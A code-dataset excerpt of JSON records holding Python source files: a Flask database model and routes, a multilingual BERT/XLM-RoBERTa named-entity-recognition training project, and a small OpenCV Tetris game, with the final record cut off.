= db.Column(db.String(1000),nullable=True) #'class名',\n style = db.Column(db.Unicode(2000),nullable=True) #'样式',\n link = db.Column(db.String(1000),nullable=True) #'链接地址',\n author = db.Column(db.String(200),nullable=True) #'添加或修改人',\n image = db.Column(db.String(1000),nullable=True) #'图片地址',\n smallimage = db.Column(db.String(1000),nullable=True) #'小图片地址',\n bigimage = db.Column(db.String(1000),nullable=True) #'大图片地址',\n desc = db.Column(db.Text,nullable=True) #'说明',\n isdefault = db.Column(db.Boolean(),default=False) #'是否默认',\n ishot = db.Column(db.Boolean(),default=False) #'是否热点',\n isstatic = db.Column(db.Boolean(),default=False) #'是否静态',\n isdelete = db.Column(db.Boolean(),default=False) #'是否删除',\n isrecommend = db.Column(db.Boolean(),default=False) #'是否推荐',\n count = db.Column(db.BigInteger(),default=0) #'点击数量',\n\n # def __init__(self):\n # pass\n # def __repr__(self):\n # return '<News %r>' % self.username\n"
},
{
"alpha_fraction": 0.6870588064193726,
"alphanum_fraction": 0.6917647123336792,
"avg_line_length": 20.25,
"blob_id": "88385e9faae98720406d75983f73bb87b5e9b964",
"content_id": "656a62379642ca03dc90ad6b40b79d6c724c5462",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 20,
"path": "/python/python-web/apps/routers/data.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\nfrom ..database import db\ndataIndex=Blueprint('data_index',__name__)\n# print(dir(News))\[email protected]('/data')\ndef data_index():\n return 'db'\n\[email protected]('/data/create')\ndef data_create():\n db.create_all()\n return 'db.create_all'\n\[email protected]('/data/drop')\ndef data_drop():\n db.drop_all()\n return 'db.drop_all'\n # return 'main'\n"
}
] | 28 |
Ryzhtus/multilingual-bert-ner | https://github.com/Ryzhtus/multilingual-bert-ner | ee9a96e38bcae3ca23b704591a28ee60238e499d | 08abaa5730f3b069bb2b6868a95ba0af20e811ca | a0190c2c06ead6e74bf95a0695931e126f1399af | refs/heads/main | 2023-04-03T14:38:04.275300 | 2021-04-21T13:41:05 | 2021-04-21T13:41:05 | 338,257,357 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6166788339614868,
"alphanum_fraction": 0.6232626438140869,
"avg_line_length": 34.07692337036133,
"blob_id": "f41d659a2ccb8526bf6d8c6c556ddfa392012060",
"content_id": "3b6ba7f7aa9b3d5e7d3366971d3a4703be5aed2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1367,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 39,
"path": "/multilingual_ner/XLM/metrics.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from seqeval.metrics import accuracy_score\n\n\nclass FMeasureStorage():\n def __init__(self):\n self.true_positive = 0\n self.false_positive = 0\n self.true_negative = 0\n self.false_negative = 0\n\n def __add__(self, iteration_result: dict):\n self.true_positive += iteration_result['TP']\n self.false_positive += iteration_result['FP']\n self.true_negative += iteration_result['TN']\n self.false_negative += iteration_result['FN']\n\n def print_rates(self):\n print('True Positives {} | False Positives {} | True Negatives {} | False Negatives {}'.format(\n self.true_positive, self.false_positive, self.true_negative, self.false_negative), end='\\n')\n\n def report(self):\n precision = self.true_positive / max(1, (self.true_positive + self.false_positive))\n recall = self.true_positive / max(1, (self.true_positive + self.false_negative))\n f1_score = 2 * (precision * recall) / (precision + recall)\n\n return f1_score, precision, recall\n\n\nclass AccuracyStorage():\n def __init__(self):\n self.true_labels = []\n self.pred_labels = []\n\n def __add__(self, labels: dict):\n self.true_labels.extend(labels['true'])\n self.pred_labels.extend(labels['pred'])\n\n def report(self):\n return accuracy_score(self.true_labels, self.pred_labels)"
},
{
"alpha_fraction": 0.6702954769134521,
"alphanum_fraction": 0.6749610900878906,
"avg_line_length": 34.77777862548828,
"blob_id": "f478c13e129b85297df816742a159b990431fedf",
"content_id": "a5186a74505075c6b5019d2f1a10fcede62e4f45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 18,
"path": "/multilingual_ner/mBERT/model.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from transformers import BertModel\nimport torch.nn as nn\n\nclass BertNER(nn.Module):\n def __init__(self, num_classes, pretrained='bert-base-multilingual-cased'):\n super(BertNER, self).__init__()\n self.embedding_dim = 768\n self.num_classes = num_classes\n\n self.bert = BertModel.from_pretrained(pretrained, output_attentions=True)\n self.linear = nn.Linear(self.embedding_dim, self.num_classes)\n\n def forward(self, tokens):\n outputs = self.bert(tokens)\n last_hidden_state = outputs['last_hidden_state']\n predictions = self.linear(last_hidden_state)\n\n return predictions, outputs"
},
{
"alpha_fraction": 0.5354821085929871,
"alphanum_fraction": 0.547535240650177,
"avg_line_length": 40.25698471069336,
"blob_id": "f52878414f7d867e7569afe97e80b6adc6a38ccd",
"content_id": "dbb650e64cfcdd90b4fa1cedb911982d84f68612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7384,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 179,
"path": "/multilingual_ner/XLM/train.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from multilingual_ner.mBERT.metrics import FMeasureStorage\nfrom seqeval.metrics import performance_measure\n\nimport torch\nimport torch.nn as nn\n\ndef clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length):\n \"\"\" this function removes <PAD>, CLS and SEP tags at each sentence\n and convert both ids of tags and batch elements to SeqEval input format\n [[first sentence tags], [second sentence tags], ..., [last sentence tags]]\"\"\"\n\n clear_labels = []\n clear_predictions = []\n\n sentence_labels = []\n sentence_predictions = []\n\n sentence_length = 0\n\n for idx in range(len(labels)):\n if labels[idx] != tag2idx['<pad>']:\n sentence_labels.append(idx2tag[labels[idx]])\n sentence_predictions.append(idx2tag[predictions[idx]])\n sentence_length += 1\n\n if sentence_length == batch_element_length:\n # not including the 0 and the last element of list, because of CLS and SEP tokens\n clear_labels.append(sentence_labels[1: len(sentence_labels) - 1])\n clear_predictions.append(sentence_predictions[1: len(sentence_predictions) - 1])\n sentence_labels = []\n sentence_predictions = []\n sentence_length = 0\n else:\n if sentence_labels:\n clear_labels.append(sentence_labels[1: len(sentence_labels) - 1])\n clear_predictions.append(sentence_predictions[1: len(sentence_predictions) - 1])\n sentence_labels = []\n sentence_predictions = []\n else:\n pass\n\n return clear_labels, clear_predictions\n\ndef train_epoch(model, criterion, optimizer, data, tag2idx, idx2tag, device, scheduler):\n epoch_loss = 0\n epoch_metrics = FMeasureStorage()\n\n model.train()\n\n for batch in data:\n tokens = batch[0].to(device)\n tags = batch[1].to(device)\n\n batch_element_length = len(tags[0])\n\n predictions = model(tokens)\n predictions = predictions.view(-1, predictions.shape[-1])\n\n tags_mask = tags != tag2idx['<pad>']\n tags_mask = tags_mask.view(-1)\n labels = torch.where(tags_mask, tags.view(-1), torch.tensor(criterion.ignore_index).type_as(tags))\n\n loss = criterion(predictions, labels)\n\n predictions = predictions.argmax(dim=1)\n\n predictions = predictions.cpu().numpy()\n labels = labels.cpu().numpy()\n\n # clear <PAD>, CLS and SEP tags from both labels and predictions\n clear_labels, clear_predictions = clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length)\n\n iteration_result = performance_measure(clear_labels, clear_predictions)\n\n epoch_metrics + iteration_result\n epoch_loss += loss.item()\n\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), 1)\n optimizer.step()\n if scheduler:\n scheduler.step()\n torch.cuda.empty_cache()\n\n epoch_f1_score, epoch_precision, epoch_recall = epoch_metrics.report()\n print('Train Loss = {:.5f}, F1-score = {:.3%}, Precision = {:.3%}, Recall = {:.3%}'.format(epoch_loss / len(data),\n epoch_f1_score,\n epoch_precision,\n epoch_recall))\n\n\ndef valid_epoch(model, criterion, data, tag2idx, idx2tag, device):\n epoch_loss = 0\n epoch_metrics = FMeasureStorage()\n\n model.eval()\n\n with torch.no_grad():\n for batch in data:\n tokens = batch[0].to(device)\n tags = batch[1].to(device)\n\n batch_element_length = len(tags[0])\n\n predictions = model(tokens)\n predictions = predictions.view(-1, predictions.shape[-1])\n tags_mask = tags != tag2idx['<pad>']\n tags_mask = tags_mask.view(-1)\n labels = torch.where(tags_mask, tags.view(-1), torch.tensor(criterion.ignore_index).type_as(tags))\n\n loss = criterion(predictions, labels)\n\n predictions = predictions.argmax(dim=1)\n\n predictions = 
predictions.cpu().numpy()\n labels = labels.cpu().numpy()\n\n # clear <PAD>, CLS and SEP tags from both labels and predictions\n clear_labels, clear_predictions = clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length)\n\n iteration_result = performance_measure(clear_labels, clear_predictions)\n\n epoch_metrics + iteration_result\n epoch_loss += loss.item()\n\n epoch_f1_score, epoch_precision, epoch_recall = epoch_metrics.report()\n print('Valid Loss = {:.5f}, F1-score = {:.3%}, Precision = {:.3%}, Recall = {:.3%}'.format(epoch_loss / len(data),\n epoch_f1_score,\n epoch_precision,\n epoch_recall))\n\n\ndef test_epoch(model, criterion, data, tag2idx, idx2tag, device):\n epoch_loss = 0\n epoch_metrics = FMeasureStorage()\n\n model.eval()\n\n with torch.no_grad():\n for batch in data:\n tokens = batch[0].to(device)\n tags = batch[1].to(device)\n\n batch_element_length = len(tags[0])\n\n predictions = model(tokens)\n predictions = predictions.view(-1, predictions.shape[-1])\n tags_mask = tags != tag2idx['<pad>']\n tags_mask = tags_mask.view(-1)\n labels = torch.where(tags_mask, tags.view(-1), torch.tensor(criterion.ignore_index).type_as(tags))\n\n loss = criterion(predictions, labels)\n\n predictions = predictions.argmax(dim=1)\n\n predictions = predictions.cpu().numpy()\n labels = labels.cpu().numpy()\n\n # clear <PAD>, CLS and SEP tags from both labels and predictions\n clear_labels, clear_predictions = clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length)\n\n iteration_result = performance_measure(clear_labels, clear_predictions)\n\n epoch_metrics + iteration_result\n epoch_loss += loss.item()\n\n epoch_f1_score, epoch_precision, epoch_recall = epoch_metrics.report()\n print('Test Loss = {:.5f}, F1-score = {:.3%}, Precision = {:.3%}, Recall = {:.3%}'.format(epoch_loss / len(data),\n epoch_f1_score,\n epoch_precision,\n epoch_recall))\n\n\ndef train_model(model, criterion, optimizer, train_data, eval_data, tag2idx, idx2tag, device, scheduler, epochs=1):\n for epoch in range(epochs):\n print('Epoch {} / {}'.format(epoch + 1, epochs))\n train_epoch(model, criterion, optimizer, train_data, tag2idx, idx2tag, device, scheduler)\n valid_epoch(model, criterion, eval_data, tag2idx, idx2tag, device)"
},
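A consistency note on the train.py record above: all three epoch loops index tag2idx['<pad>'], while the dataset.py record later in this repo builds the tag vocabulary with uppercase '<PAD>', so as written the lookup raises KeyError. A minimal patch sketch, assuming the dataset's spelling is the intended one, is to use the uppercase key everywhere train.py touches it (in clear_tags and in the mask lines). Note also that the bare statement epoch_metrics + iteration_result only has an effect if FMeasureStorage.__add__ mutates the accumulator in place, which metrics.py is assumed to do here.

```python
# hypothetical one-line fix, repeated in train_epoch/valid_epoch/test_epoch
# and in clear_tags: match the key that WikiAnnDataset actually defines.
tags_mask = tags != tag2idx['<PAD>']
```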
{
"alpha_fraction": 0.5909494161605835,
"alphanum_fraction": 0.5953859686851501,
"avg_line_length": 32.81999969482422,
"blob_id": "43ef39e2be0653c83aaff68aecdf6f623305a7bd",
"content_id": "d3434bf967633f6d558f23903274a2d8489a51bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3381,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 100,
"path": "/multilingual_ner/mBERT/dataset.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn.utils.rnn import pad_sequence\nfrom collections import Counter\n\n\nclass WikiAnnDataset(Dataset):\n def __init__(self, sentences, tags, tokenizer):\n self.sentences = sentences\n self.sentences_tags = tags\n\n self.tokenizer = tokenizer\n\n self.ner_tags = ['<PAD>'] + list(set(tag for tag_list in self.sentences_tags for tag in tag_list))\n self.tag2idx = {tag: idx for idx, tag in enumerate(self.ner_tags)}\n self.idx2tag = {idx: tag for idx, tag in enumerate(self.ner_tags)}\n\n def __len__(self):\n return len(self.sentences)\n\n def __getitem__(self, item):\n words = self.sentences[item]\n tags = self.sentences_tags[item]\n\n word2tag = dict(zip(words, tags))\n\n tokens = []\n tokenized_tags = []\n\n for word in words:\n if word not in ('[CLS]', '[SEP]'):\n subtokens = self.tokenizer.tokenize(word)\n for i in range(len(subtokens)):\n tokenized_tags.append(word2tag[word])\n tokens.extend(subtokens)\n\n tokens = ['[CLS]'] + tokens + ['[SEP]']\n tokens_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n\n tokenized_tags = ['O'] + tokenized_tags + ['O']\n tags_ids = [self.tag2idx[tag] for tag in tokenized_tags]\n\n return torch.LongTensor(tokens_ids), torch.LongTensor(tags_ids)\n\n def entities_statistics(self):\n entity_types_counter = Counter()\n\n for tags_idx in range(len(self.sentences_tags)):\n entity = []\n\n for idx in range(len(self.sentences_tags[tags_idx])):\n if self.sentences_tags[tags_idx][idx] != 'O':\n entity.append(self.sentences_tags[tags_idx][idx])\n else:\n entity_types_counter['O'] += 1\n\n if entity:\n for idx in range(len(entity)):\n if entity[idx][0] == 'B':\n entity_tag = entity[idx][2:]\n entity_types_counter[entity_tag] += 1\n\n return entity_types_counter\n\n def BIO_tags_statistics(self):\n bio_types_counter = Counter()\n\n for tags_idx in range(len(self.sentences_tags)):\n for idx in range(len(self.sentences_tags[tags_idx])):\n bio_types_counter[self.sentences_tags[tags_idx][idx]] += 1\n\n return bio_types_counter\n\n def paddings(self, batch):\n tokens, tags = list(zip(*batch))\n\n tokens = pad_sequence(tokens, batch_first=True, padding_value=self.tag2idx['<PAD>'])\n tags = pad_sequence(tags, batch_first=True, padding_value=self.tag2idx['<PAD>'])\n\n return tokens, tags\n\n\ndef read_data(filename):\n rows = open(filename, 'r').read().strip().split(\"\\n\\n\")\n sentences, sentences_tags = [], []\n\n for sentence in rows:\n words = [line.split()[0][3:] for line in sentence.splitlines()]\n tags = [line.split()[-1] for line in sentence.splitlines()]\n sentences.append(words)\n sentences_tags.append(tags)\n\n return sentences, sentences_tags\n\n\ndef create_dataset_and_dataloader(filename, batch_size, tokenizer):\n sentences, tags = read_data(filename)\n dataset = WikiAnnDataset(sentences, tags, tokenizer)\n\n return dataset, DataLoader(dataset, batch_size, collate_fn=dataset.paddings)"
},
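The __getitem__ above duplicates each word's tag across its WordPiece sub-tokens and wraps the sequence in [CLS]/[SEP] with 'O' tags; a minimal sketch of exercising that alignment (the two toy sentences are hypothetical, and WikiAnnDataset is the class from the record above):

```python
from transformers import BertTokenizer

# hypothetical toy data in BIO format
sentences = [['John', 'lives', 'in', 'Berlin'], ['Acme', 'Corp']]
tags = [['B-PER', 'O', 'O', 'B-LOC'], ['B-ORG', 'I-ORG']]

tokenizer = BertTokenizer.from_pretrained('bert-base-multilingual-cased', do_lower_case=False)
dataset = WikiAnnDataset(sentences, tags, tokenizer)

token_ids, tag_ids = dataset[0]
# every WordPiece of a word carries that word's tag; [CLS]/[SEP] carry 'O'
print(tokenizer.convert_ids_to_tokens(token_ids.tolist()))
print([dataset.idx2tag[i] for i in tag_ids.tolist()])
```

One caveat visible in the code: word2tag = dict(zip(words, tags)) keys on the word string, so a word that repeats within one sentence under different tags silently receives the last tag.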
{
"alpha_fraction": 0.6654478907585144,
"alphanum_fraction": 0.6727604866027832,
"avg_line_length": 31.235294342041016,
"blob_id": "db6157077984c87c65e5a11b440bb06af6091362",
"content_id": "48d10b648100f0d309cf6cd1efc10cc471668d64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 547,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/multilingual_ner/XLM/model.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from transformers import XLMRobertaModel\nimport torch.nn as nn\n\nclass XLMRoBERTaNER(nn.Module):\n def __init__(self, num_classes):\n super(XLMRoBERTaNER, self).__init__()\n self.embedding_dim = 768\n self.num_classes = num_classes\n\n self.RoBERTa = XLMRobertaModel.from_pretrained(\"xlm-roberta-base\")\n self.linear = nn.Linear(self.embedding_dim, self.num_classes)\n\n def forward(self, tokens):\n embeddings = self.RoBERTa(tokens)[0]\n predictions = self.linear(embeddings)\n\n return predictions"
},
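The model above is a plain token-classification head, a single linear layer over per-token XLM-R embeddings, so the logits keep the (batch, seq_len, num_classes) shape; a quick shape check (the random ids are placeholders rather than a real tokenization, and the pretrained weights must be downloadable):

```python
import torch

model = XLMRoBERTaNER(num_classes=9)      # 9 is an arbitrary example tag count
tokens = torch.randint(0, 1000, (2, 16))  # fake batch: 2 sequences of 16 token ids
logits = model(tokens)
print(logits.shape)                       # torch.Size([2, 16, 9])
```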
{
"alpha_fraction": 0.786415696144104,
"alphanum_fraction": 0.7937806844711304,
"avg_line_length": 39.766666412353516,
"blob_id": "b162a9ed10db470d9c470f7bc5ed0ec821835550",
"content_id": "9a81810dbd272a7a1e58c97f74f03697f254cfa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1222,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 30,
"path": "/multilingual_ner/mBERT/run.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from multilingual_ner.mBERT.dataset import create_dataset_and_dataloader\nfrom multilingual_ner.mBERT.train import train_model\nfrom multilingual_ner.mBERT.model import BertNER\n\nfrom transformers import BertTokenizer\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nTOKENIZER = BertTokenizer.from_pretrained('bert-base-multilingual-cased', do_lower_case=False)\nDEVICE = 'cuda' if torch.cuda.is_available else 'cpu'\nEPOCHS = 4\nBATCH_SIZE = 16\n\n\ntrain_dataset, train_dataloader = create_dataset_and_dataloader('train', BATCH_SIZE, TOKENIZER)\neval_dataset, eval_dataloader = create_dataset_and_dataloader('validation', BATCH_SIZE, TOKENIZER)\ntest_dataset, test_dataloader = create_dataset_and_dataloader('test', BATCH_SIZE, TOKENIZER)\n\nclasses = len(train_dataset.ner_tags)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nSpanishBertModel = BertNER(classes, pretrained='bert-base-multilingual-cased').to(device)\noptimizer = optim.AdamW(SpanishBertModel.parameters(), lr=2e-5)\ncriterion = nn.CrossEntropyLoss(ignore_index=0).to(device)\nEPOCHS = 4\n\ntrain_model(SpanishBertModel, criterion, optimizer, train_dataloader, eval_dataloader, train_dataset.tag2idx, train_dataset.idx2tag, device, None, EPOCHS)"
},
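train_model above threads a scheduler down to train_epoch (which steps it once per batch), but this script passes None; if linear warmup is wanted, a sketch along these lines could replace the final call. It assumes a transformers version that ships get_linear_schedule_with_warmup, and the 10% warmup fraction is an arbitrary choice, not something the repo prescribes:

```python
from transformers import get_linear_schedule_with_warmup

total_steps = len(train_dataloader) * EPOCHS
scheduler = get_linear_schedule_with_warmup(
    optimizer,
    num_warmup_steps=int(0.1 * total_steps),  # arbitrary 10% warmup
    num_training_steps=total_steps,
)
train_model(SpanishBertModel, criterion, optimizer, train_dataloader, eval_dataloader,
            train_dataset.tag2idx, train_dataset.idx2tag, device, scheduler, EPOCHS)
```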
{
"alpha_fraction": 0.7815992832183838,
"alphanum_fraction": 0.7893379330635071,
"avg_line_length": 39.13793182373047,
"blob_id": "f283cae2e4ce8c38952783644a96e6dcb6524fff",
"content_id": "089d9a31da5bdf489d36d985197c197b3860a820",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1163,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 29,
"path": "/multilingual_ner/XLM/run.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from multilingual_ner.XLM.dataset import create_dataset_and_dataloader\nfrom multilingual_ner.XLM.train import train_model\nfrom multilingual_ner.XLM.model import XLMRoBERTaNER\n\nfrom transformers import XLMRobertaTokenizer\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nTOKENIZER = XLMRobertaTokenizer.from_pretrained('xlm-roberta-base', do_lower_case=False)\nDEVICE = 'cuda' if torch.cuda.is_available else 'cpu'\nEPOCHS = 4\nBATCH_SIZE = 16\n\ntrain_dataset, train_dataloader = create_dataset_and_dataloader('train', BATCH_SIZE, TOKENIZER)\neval_dataset, eval_dataloader = create_dataset_and_dataloader('validation', BATCH_SIZE, TOKENIZER)\ntest_dataset, test_dataloader = create_dataset_and_dataloader('test', BATCH_SIZE, TOKENIZER)\n\nclasses = len(train_dataset.ner_tags)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nXLM_Model = XLMRoBERTaNER(classes).to(device)\noptimizer = optim.AdamW(XLM_Model.parameters(), lr=2e-5)\ncriterion = nn.CrossEntropyLoss(ignore_index=0).to(device)\nEPOCHS = 4\n\ntrain_model(XLM_Model, criterion, optimizer, train_dataloader, eval_dataloader, train_dataset.tag2idx, train_dataset.idx2tag, device, None, EPOCHS)"
}
] | 7 |
liuguangyuan/tetris | https://github.com/liuguangyuan/tetris | e380756212232eed04ea47d5a3dbe8c58c82b056 | 8c1dd7a055130dca8d3de39bc485acb87ab1a817 | d3d240581419b1024c676b99570266be6ef95a36 | refs/heads/master | 2021-04-09T11:50:10.720011 | 2018-03-16T11:26:16 | 2018-03-16T11:26:16 | 125,476,000 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.47085657715797424,
"alphanum_fraction": 0.4982260465621948,
"avg_line_length": 25.66216278076172,
"blob_id": "3e4ddba35f9f58dcf59a3249187074a7b3c04881",
"content_id": "0195aea867e3bc08659fb2f05702bc3faa2a28b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1973,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 74,
"path": "/main.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import sys\nimport cv2\nimport numpy as np\nfrom actor import Actor, ACTORS \nfrom background import Bg\nimport random\nimport time\n\ndef show(img_name, img_data, x=0, y=0):\n cv2.namedWindow(img_name)\n cv2.moveWindow(img_name, x, y)\n cv2.imshow(img_name, img_data)\n\ndef get_actor(col):\n mmax = len(ACTORS) - 1 \n p = random.randint(0, mmax)\n dataset = ACTORS[p]\n _, acol = dataset.shape \n y = (col - acol) / 2\n return Actor(dataset, 0, y) \n\nif __name__ == '__main__':\n _quit = False \n col = 10 \n dataset = np.zeros((20, col), dtype=int)\n bg = Bg(dataset)\n tmp_bg = bg\n curr_actor = None\n reserve_actor = get_actor(col)\n begin_time = time.time() \n score = 0\n while not _quit:\n if not curr_actor:\n curr_actor = reserve_actor\n reserve_actor = get_actor(col)\n show('next actor', reserve_actor.get_img(), 200, 0)\n tmp_bg = bg.add(curr_actor)\n show('tetris', tmp_bg.get_img(), 500, 0)\n print('****************')\n print('score:', score)\n print('time: ', time.time() - begin_time)\n print('****************')\n print('')\n\n c = cv2.waitKey(1000)\n if c == 27:\n _quit = True \n elif c == 65361:\n curr_actor.left(bg)\n tmp_bg = bg.add(curr_actor)\n continue\n elif c == 65363:\n curr_actor.right(bg)\n tmp_bg = bg.add(curr_actor)\n continue\n elif c == 65362:\n curr_actor.rotate(bg)\n tmp_bg = bg.add(curr_actor)\n\n elif c == 65364:\n curr_actor.Down(bg)\n else:\n pass\n ret = curr_actor.Down(bg)\n if curr_actor.x == 0:\n sys.exit('game over')\n tmp_bg = bg.add(curr_actor)\n if ret == -1:\n bg = tmp_bg\n bg.refresh()\n tmp_bg = bg\n curr_actor = None\n score = score + 1\n cv2.destroyAllWindows()\n"
},
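The magic numbers 65361-65364 in the event loop above are the X11 key codes that cv2.waitKey returns for the arrow keys on Linux GTK builds of OpenCV (other platforms report different codes); naming them is a cheap readability win. A sketch of the same dispatch values:

```python
# X11 arrow-key codes as returned by cv2.waitKey on Linux (assumption:
# a GTK build of OpenCV; Windows builds use different codes)
KEY_ESC = 27
KEY_LEFT = 65361
KEY_UP = 65362     # used for rotate in main.py
KEY_RIGHT = 65363
KEY_DOWN = 65364
```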
{
"alpha_fraction": 0.4843423664569855,
"alphanum_fraction": 0.49269309639930725,
"avg_line_length": 25.127273559570312,
"blob_id": "8802ef5b417bb7aac3ff8056266708656878d8da",
"content_id": "0a1e46df8c2efa40f7e70375cd8e247c5e35cf52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1437,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 55,
"path": "/background.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom display import Dp\nclass Bg:\n def __init__(self, dataset):\n self.__dataset = dataset\n\n def add(self, actor):\n tmp = np.array(self.__dataset, copy=True)\n row, col = actor.shape()\n x = actor.x\n y = actor.y\n for i in range(row):\n for j in range(col):\n tmp[x+i][y+j] = tmp[x+i][y+j] + actor.value()[i][j]\n\n return Bg(tmp) \n\n def refresh(self):\n ds = []\n row, col = self.__dataset.shape\n for i in range(row):\n sum = 0\n for j in range(col):\n sum = sum + self.__dataset[i][j]\n if sum == col:\n ds.append(i)\n tmp = np.delete(self.__dataset, ds, 0)\n for i in range(len(ds)):\n tmp = np.insert(tmp, 0, np.array(col*[0]), 0)\n self.__dataset = tmp\n\n def value(self):\n return self.__dataset\n\n def shape(self):\n return self.__dataset.shape\n\n def clear(self):\n row, col = self.__dataset.shape\n for i in range(row):\n for j in range(col):\n self.__dataset[i][j] = 0\n\n def get_img(self):\n dp = Dp(self.__dataset)\n return dp.get_img()\n\nif __name__ == '__main__':\n from actor import Actor, ACTORS\n dataset = np.zeros((10, 8), dtype=int)\n print dataset\n bg = Bg(dataset)\n ac = Actor(ACTORS[0], 1,1)\n tmp = bg.add(ac)\n print tmp.value()\n"
},
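refresh() above clears completed rows by collecting the indices of full rows, deleting them with np.delete, and re-inserting one zero row at the top per cleared row, which is what makes the stack "fall". A standalone numpy demo of the same idea:

```python
import numpy as np

board = np.array([[0, 1, 0],
                  [1, 1, 1],   # full row: should be cleared
                  [1, 0, 1]])

full_rows = [i for i in range(board.shape[0]) if board[i].sum() == board.shape[1]]
board = np.delete(board, full_rows, 0)          # drop the full rows
for _ in full_rows:                             # pad zero rows back on top
    board = np.insert(board, 0, np.zeros(board.shape[1], dtype=int), 0)

print(board)
# [[0 0 0]
#  [0 1 0]
#  [1 0 1]]
```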
{
"alpha_fraction": 0.5193405151367188,
"alphanum_fraction": 0.5358275175094604,
"avg_line_length": 32.553192138671875,
"blob_id": "c4a14a41e5f403c456af5d34e66b1d8b43ddafd2",
"content_id": "1465b330ee17a529343486c9f1f273ea910894c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/display.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nclass Dp:\n def __init__(self, dataset0, length=32, thick=2):\n self.length = length\n self.thick = thick\n self.o_length = length - thick\n self.__BLACK = self.__get_black()\n self.__WHITE = self.__get_white()\n row,col = dataset0.shape\n self.__dataset = np.zeros((row*length, col*length))\n for i in range(row):\n for j in range(col):\n bi = length*i\n bj = length*j\n if dataset0[i][j] == 1:\n self.__dataset[bi:bi+length, bj:bj+length] = self.__BLACK\n else:\n self.__dataset[bi:bi+length, bj:bj+length] = self.__WHITE\n self.__img = np.reshape(self.__dataset,(row*length, col*length, 1))\n\n def __get_black(self):\n length = self.length\n o_length = self.o_length\n thick = self.thick\n black = 255*np.ones((length, length), dtype = np.int)\n black[thick:o_length,thick:o_length] = black[thick:o_length,thick:o_length] -255\n return black\n\n def __get_white(self):\n length = self.length\n o_length = self.o_length\n thick = self.thick\n white = np.zeros((length, length), dtype=np.int)\n white[thick:o_length, thick:o_length] = white[thick:o_length, thick:o_length] + 255\n return white\n\n def get_img(self):\n return self.__img\n\nif __name__ == '__main__':\n import cv2\n a = np.array([[0,1],[0,0]])\n dp = Dp(a, length = 32)\n print dp.get_img()\n cv2.imshow('av', dp.get_img())\n cv2.waitKey()\n"
},
{
"alpha_fraction": 0.41777586936950684,
"alphanum_fraction": 0.4555603265762329,
"avg_line_length": 24.877777099609375,
"blob_id": "4404700481c82058384a1098c270f15ab5d0fda8",
"content_id": "12d488019319a44a91915a8568594ec7809c8c2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2329,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 90,
"path": "/actor.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
